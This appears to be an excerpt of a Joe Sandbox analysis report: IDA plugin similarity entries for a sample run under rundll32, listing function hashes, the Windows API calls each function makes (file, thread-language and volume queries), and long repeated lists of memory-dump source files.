                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleInformationLogicalModuleProcProcessor
                          • String ID: GetLogicalProcessorInformation$kernel32.dll
                          • API String ID: 4292003513-812649623
                          • Opcode ID: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                          • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                          • Opcode Fuzzy Hash: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                          • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                          • String ID:
                          • API String ID: 3559396350-0
                          • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                          • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorFileLast$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 1269242970-0
                          • Opcode ID: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                          • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                          • Opcode Fuzzy Hash: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                          • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesErrorFileLast
                          • String ID:
                          • API String ID: 1799206407-0
                          • Opcode ID: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                          • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                          • Opcode Fuzzy Hash: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                          • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLastError.KERNEL32 ref: 005115CB
                            • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                          • GetLastError.KERNEL32 ref: 00511666
                            • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                            • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                          • String ID: XLM$5B
                          • API String ID: 3390516113-4037079664
                          • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                          • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetThreadUILanguage.KERNEL32 ref: 004145B9
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Thread$LanguagesPreferred$Language
                          • String ID:
                          • API String ID: 2255706666-0
                          • Opcode ID: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction ID: 57eada3b38194d7b08bb3a3721538a05868af864e37c8cd442cfa6c9d7bf3455
                          • Opcode Fuzzy Hash: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction Fuzzy Hash: 0F31B0723015609ADB58DF36DA543EA2762EB84BDCF446126FA0A47B58EF7CC8C5C344
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • GetVolumeInformationW.KERNEL32 ref: 0043657C
                          • GetDriveTypeW.KERNEL32 ref: 004365D7
                            • Part of subcall function 00436880: GetFileAttributesW.KERNEL32 ref: 0043689F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
